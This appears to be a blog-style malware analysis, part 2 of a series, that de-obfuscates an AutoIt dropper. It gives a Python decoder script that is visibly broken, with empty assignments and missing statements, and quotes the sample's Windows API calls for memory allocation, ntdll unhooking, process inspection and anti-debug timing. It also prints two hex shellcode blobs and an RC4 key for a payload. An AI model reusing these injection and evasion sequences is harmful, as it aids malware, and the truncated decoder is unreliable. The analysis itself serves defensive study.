Malware Analysis 1 - Part 2

In part 1 we received the obfuscated script.  Now we de-obfuscate the script using some python.  As a brief explanation, PATMEANS is the decoder function that decodes each line before it is processed by the script.  We found where the PATMEANS function is located Inside the Autoit script and, with the assistance of AI, have made a python script to decode each line that would be decoded via the PATMEANS function:


# malwareZBS and AI

import re
def decode_patmeans(match):

    #Decodes PATMEANS strings using arithmetic key and Unicode conversion"""

    encoded_str =
    key_expr =    

    # Calculate 32-bit overflow aware key

    terms = [term.strip() for term in key_expr.split('+')]
    key_sum = sum(int(t) for t in terms)
    effective_key = key_sum % (2**32)

    # Process encoded characters

    decoded_chars = []
    for code_str in encoded_str.split('%'):
        if not code_str:
        char_code = int(code_str) - effective_key

    return f'"{ "".join(decoded_chars) }"'

def process_autoit_file(input_file, output_file):

    """Main processing function with regex pattern matching"""

    pattern = re.compile(

        with open(input_file, 'r', encoding='utf-8') as infile, \
             open(output_file, 'w', encoding='utf-8') as outfile:
            for line_number, line in enumerate(infile, 1):
                    modified_line = pattern.sub(decode_patmeans, line)
                except Exception as e:

                    print(f"Error processing line {line_number}: {str(e)}")
                    outfile.write(line)  # Preserve original line on error
    except FileNotFoundError:
        print("Error: Input file not found")
    except Exception as e:
        print(f"Unexpected error: {str(e)}")
if __name__ == "__main__":
    import sys
    if len(sys.argv) != 3:

        print("Usage: python <input.au3> <output.au3>")

    process_autoit_file(sys.argv[1], sys.argv[2])



In looking at the Script, we see some dll calls:


DllCall ( "kernel32.dll" , "int" , "lstrlenA" , "struct*" , $DISTRIBUTORSHYPOTHESISLEAST ) [ 0 ] & "]" , $REYNOLDSHELLODISPUTE + UNWRAPPENSTOLERANCE ( $RXINVOLVING , "RVAModuleName" ) )

DllCall ( "kernel32.dll" , "handle" , "LoadLibraryW" , "wstr" , UNWRAPPENSTOLERANCE ( $LIFETIMEFOUNDATIONSLEXUSMOUNTED , "Name" ) ) [ 0 ]

DllCall ( "kernel32.dll" , "int" , "lstrlenA" , "struct*" , $STRAPDEPOTAPPLIEDHONORS ) [ 0 ] & "]" , $REYNOLDSHELLODISPUTE + $PETROB )

DllCall ( "ntdll.dll" , "bool" , "NtProtectVirtualMemory" , "handle" , 

DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" ) [ 0 ] , "ptr" , DllStructGetPtr ( $ACTIVEFORT , "address" ) , "ptr" , DllStructGetPtr ( $REDEEMREGIONSVID , "size" ) , "dword" , $COMMENTEDAIMEDTUNNELSCSI , "dword*" , "" )

DllCall ( "kernel32.dll" , "uint" , "SetErrorMode" , "dword" , 32774 )

DllCall ( "kernel32.dll" , "uint" , "SetErrorMode" , "dword" , 0 ) [ 0 ] ) <> 32774 ) ? ( Call ( "WinClose" , Call ( "AutoItWinGetTitle" ) ) ) : ( Opt ( "TrayIconHide" , 10504404 / 10504404 ) )

DllCall ( "ntdll.dll" , "uint" , "RtlGetCompressionWorkSpaceSize" , "ushort" , 2 , "ulong*" , 0 , "ulong*" , 0 )

DllCall ( "ntdll.dll" , "int" , "RtlDecompressFragment" , "ushort" , 2 , "ptr" , DllStructGetPtr ( $MOBILITYSHORTSINVESTIGATION ) , "dword" , DllStructGetSize ( $MOBILITYSHORTSINVESTIGATION ) , "ptr" , DllStructGetPtr ( $DELICIOUSNOWNOVELSPRESENCE ) , "dword" , DllStructGetSize ( $DELICIOUSNOWNOVELSPRESENCE ) , "dword" , 0 , "dword*" , 0 , "ptr" , DllStructGetPtr ( $BMWSHAMEPENALTIES ) )


DllStructCreate ( "byte[" & Call ( "BinaryLen" , $RANKGOLDCHARGES ) & "]" , DllCall ( "kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , 0 , "ulong_ptr" , 

Call ( "BinaryLen" , $RANKGOLDCHARGES ) , "dword" , 4096 , "dword" , 64 ) [ 0 ] )

DllCall ( "user32.dll" , "uint" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $JUNIORINSERTION , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED ) , "uint" , $RETIREDNPIVCOMPATIBLE , "int" , 0 )

DllCallAddress ( "int" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $PACKAGESBLOGGERSEMIRATESSPAIN , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED2 ) , "uint" , $RETIREDNPIVCOMPATIBLE2 , "int" , 0 )

DllCall ( "user32.dll" , "uint" , "CallWindowProc" , "ptr" , DllStructGetPtr ( $THEIRDOCUMENTARY ) + $PACKAGESBLOGGERSEMIRATESSPAIN , "ptr" , DllStructGetPtr ( $DEVICEBESIDES ) , "ptr" , DllStructGetPtr ( $LYRICRESPECTED2 ) , "uint" , $RETIREDNPIVCOMPATIBLE2 , "int" , 0 )

DllCall ( "kernel32.dll" , "handle" , "CreateToolhelp32Snapshot" , "dword" , 2 , "dword" , 0 ) [ 0 ]

DllCall ( "kernel32.dll" , "bool" , "Process32FirstW" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON , "struct*" , $FILTERNOR )

DllCall ( @SystemDir & "\psapi.dll" , "dword" , "GetModuleFileNameExW" , "handle" , DllCall ( "kernel32.dll" , "handle" , "OpenProcess" , "dword" , 4112 , "bool" , 0 , "dword" , UNWRAPPENSTOLERANCE ( $FILTERNOR , "ParentProcessID" ) ) [ 0 ] , "handle" , 0 , "wstr" , "" , "int" , 4096 ) [ 3 ]

DllCall ( "kernel32.dll" , "bool" , "Process32NextW" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON , "struct*" , $FILTERNOR )

DllCall ( "kernel32.dll" , "bool" , "CloseHandle" , "handle" , $FURNISHINGSCREATEDFRIENDSHIPCARTOON )

DllCall ( "kernel32.dll" , "handle" , "LoadLibraryExW" , "wstr" , $HIGHUSR , "ptr" , 0 , "dword" , 1 ) [ 0 ]

DllCall ( "kernel32.dll" , "ptr" , "VirtualAlloc" , "ptr" , $LUISHOPE , "ulong_ptr" , $DERIVERSIDE , "dword" , 12288 , "dword" , 4 ) [ 0 ]

DllCallAddress ( "bool" , $PROSTATECONFIDENT , "ptr" , $LUISHOPE , "dword" , 1 , "ptr" , 0 )

DllCall ( "ntdll.dll" , "bool" , "LdrUnloadDll" , "handle" , $LUISHOPE ) [ 0 ]

DllCall ( "kernel32.dll" , "hwnd" , "GetCurrentProcess" )

DllCall ( "kernel32.dll" , "hwnd" , "GetModuleHandleA" , "str" , "ntdll.dll" )

DllCall ( "psapi.dll" , "bool" , "GetModuleInformation" , "hwnd" , $INDICATEDCOMPLIANCE [ 0 ] , "hwnd" , $FLUXDJPOWERSDEAN [ 0 ] , "ptr" , DllStructGetPtr ( $IISHAPEORANGE ) , "dword" , DllStructGetSize ( $IISHAPEORANGE ) )

DllCall ( "kernel32.dll" , "hwnd" , "CreateFileA" , "str" , @SystemDir & "\ntdll.dll" , "dword" , 2147483648 , "dword" , 1 , "ptr" , 0 , "dword" , 3 , "dword" , 0 , "ptr" , 0 )

DllCall ( "kernel32.dll" , "hwnd" , "CreateFileMapping" , "hwnd" , $INDEXSALMON [ 0 ] , "ptr" , 0 , "dword" , 16777218 , "dword" , 0 , "dword" , 0 , "ptr" , 0 )

DllCall ( "kernel32.dll" , "ptr" , "MapViewOfFile" , "hwnd" , $CURIOUSPACKSINQUIRE [ 0 ] , "dword" , 4 , "dword" , 0 , "dword" , 0 , "dword" , 0 )

DllCall ( "kernel32.dll" , "bool" , "VirtualProtect" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) , "dword" , 64 , "dword*" , 0 )


DllCall ( "kernel32.dll" , "bool" , "VirtualProtect" , "ptr" , $BLESSEDBLOG + UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualAddress" ) , "dword" , UNWRAPPENSTOLERANCE ( $FAVORSALGERIAFARMSMENTAL , "VirtualSize" ) , "dword" , $BROADWAYMUSIC [ 4 ] , "dword*" , 0 )

DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $INDICATEDCOMPLIANCE [ 0 ] )

DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $INDEXSALMON [ 0 ] )

DllCall ( "kernel32.dll" , "none" , "CloseHandle" , "hwnd" , $CURIOUSPACKSINQUIRE [ 0 ] )

DllCall ( "kernel32.dll" , "none" , "FreeLibrary" , "hwnd" , $FLUXDJPOWERSDEAN [ 0 ] )

DllCall ( "kernel32.dll" , "handle" , "OpenProcess" , "dword" , 4112 , "bool" , 0 , "dword" , $DOLLARTRANSPARENT ) [ 0 ]DllCall ( "ntdll.dll" , "long" , "NtQueryInformationProcess" , "handle" , $ASPMARRIOTTDOZEN , "ulong" , 0 , "struct*" , $DPATHENSAPPS , "ulong" , DllStructGetSize ( $DPATHENSAPPS ) , "ulong*" , 0 )

DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $DPATHENSAPPS , "PebBaseAddress" ) , "struct*" , $FOLLOWINGREVEALEDDEPOSITS , "ulong_ptr" , DllStructGetSize ( $FOLLOWINGREVEALEDDEPOSITS ) , "ulong_ptr*" , 0 )

DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $FOLLOWINGREVEALEDDEPOSITS , "ProcessParameters" ) , "struct*" , $CLOSESTIMPORTEDFRENTERS , "ulong_ptr" , DllStructGetSize ( $CLOSESTIMPORTEDFRENTERS ) , "ulong_ptr*" , 0 )

DllCall ( "ntdll.dll" , "long" , "NtReadVirtualMemory" , "handle" , $ASPMARRIOTTDOZEN , "ptr" , UNWRAPPENSTOLERANCE ( $CLOSESTIMPORTEDFRENTERS , "CommandLine" ) , "wstr" , 0 , "ulong_ptr" , DllStructGetSize ( $SHIPECONOMICSAPTLOUISE ) , "ulong_ptr*" , 0 )

DllCall ( "kernel32.dll" , "bool" , "CloseHandle" , "handle" , $ASPMARRIOTTDOZEN )

DllCall ( "ntdll.dll" , "int" , "NtUnmapViewOfSection" , "handle" , DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" ) [ 0 ] , "ptr" , $PTPATRICIABED )

DllCall ( "kernel32.dll" , "long" , "GetTickCount" ) [ 0 ]

DllCall ( "kernel32.dll" , "DWORD" , "Sleep" , "dword" , $IISHAPEORANGELIS )

DllCall ( "kernel32.dll" , "long" , "GetTickCount" ) [ 0 ]

DllCall ( "kernel32.dll" , "handle" , "GetCurrentProcess" )

DllCall ( "ntdll.dll" , "int" , "ZwQueryInformationProcess" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] , "int" , 0 , "ptr" , DllStructGetPtr ( $INVESTINGBLEND ) , "int" , DllStructGetSize ( $INVESTINGBLEND ) , "int" , 0 )

DllCall ( "kernel32.dll" , "int" , "ReadProcessMemory" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] , "ptr" , UNWRAPPENSTOLERANCE ( $INVESTINGBLEND , 2 ) + 16 , "ptr" , DllStructGetPtr ( $TOOLINSURANCE ) , "int" , 4 , "ptr" , 0 )

DllCall ( "kernel32.dll" , "int" , "CloseHandle" , "hwnd" , $ATTRACTIONSEEKSGODLOT1 [ 0 ] )


Cookie cutter malware calls.

There also appear to be 3 payload sections in hex:


Local $RANKGOLDCHARGES = "0x9090554889C84889D54989CA4531C95756534883EC08C70100000000C741040000000045884A084183C1014983C2014181F90001000075EB488DB9000100004531D2664531C9EB3641BA0100000031F60FB658080FB6142E8D3413468D0C0E450FB6C94D63D9420FB6741908408870084883C00142885C19084839F8740E4539D07EC54963F24183C201EBC44883C4085B5E5F5DC389C056534883EC084585C0448B11448B49047E4E4183E8014A8D7402014183C2014181E2FF0000004963DA0FB6441908468D0C08450FB6C94D63D9460FB644190844884419084288441908418D04000FB6C00FB644010830024883C2014839F275BB448911448949044883C4085B5EC3" //CodeA

Local $RANKGOLDCHARGES = "0x90905531C057565383EC088B4C241C8B7C2420C70100000000C74104000000008844010883C0013D0001000075F28D910001000031DB8954240489C831D2891C2489CEEB32C704240100000031ED0FB648080FB61C2F8D2C198D5415000FB6D20FB66C160889EB88580883C001884C16083B44240474128B0C24394C24247EC58B2C2483042401EBC583C4085B5E5F5DC2100089C05557565383EC088B5424248B44241C8B6C242085D28B188B48047E5B31D2895C2404892C248B5C240483C30181E3FF000000895C24040FB67418088B6C24048D0C0E0FB6C90FB67C080889FB885C280889F38D343781E6FF000000885C08080FB67430088B3C2489F3301C1783C2013B54242475B089EB891889480483C4085B5E5F5DC21000" //CodeB


This seems to be a check of sorts(excuse my non-syntax):

 IF {

Execute ( "@AutoItX64" ) ;






The 3rd payload is actually a large hex code, that when decoded in RC4 with the key "7934829523295748309624084421185521891819" produces a binary with random bytes inserted:

And with that, this part 2 is over.  Stay tuned for part 3!!


Malware Analysis 1 - Part 1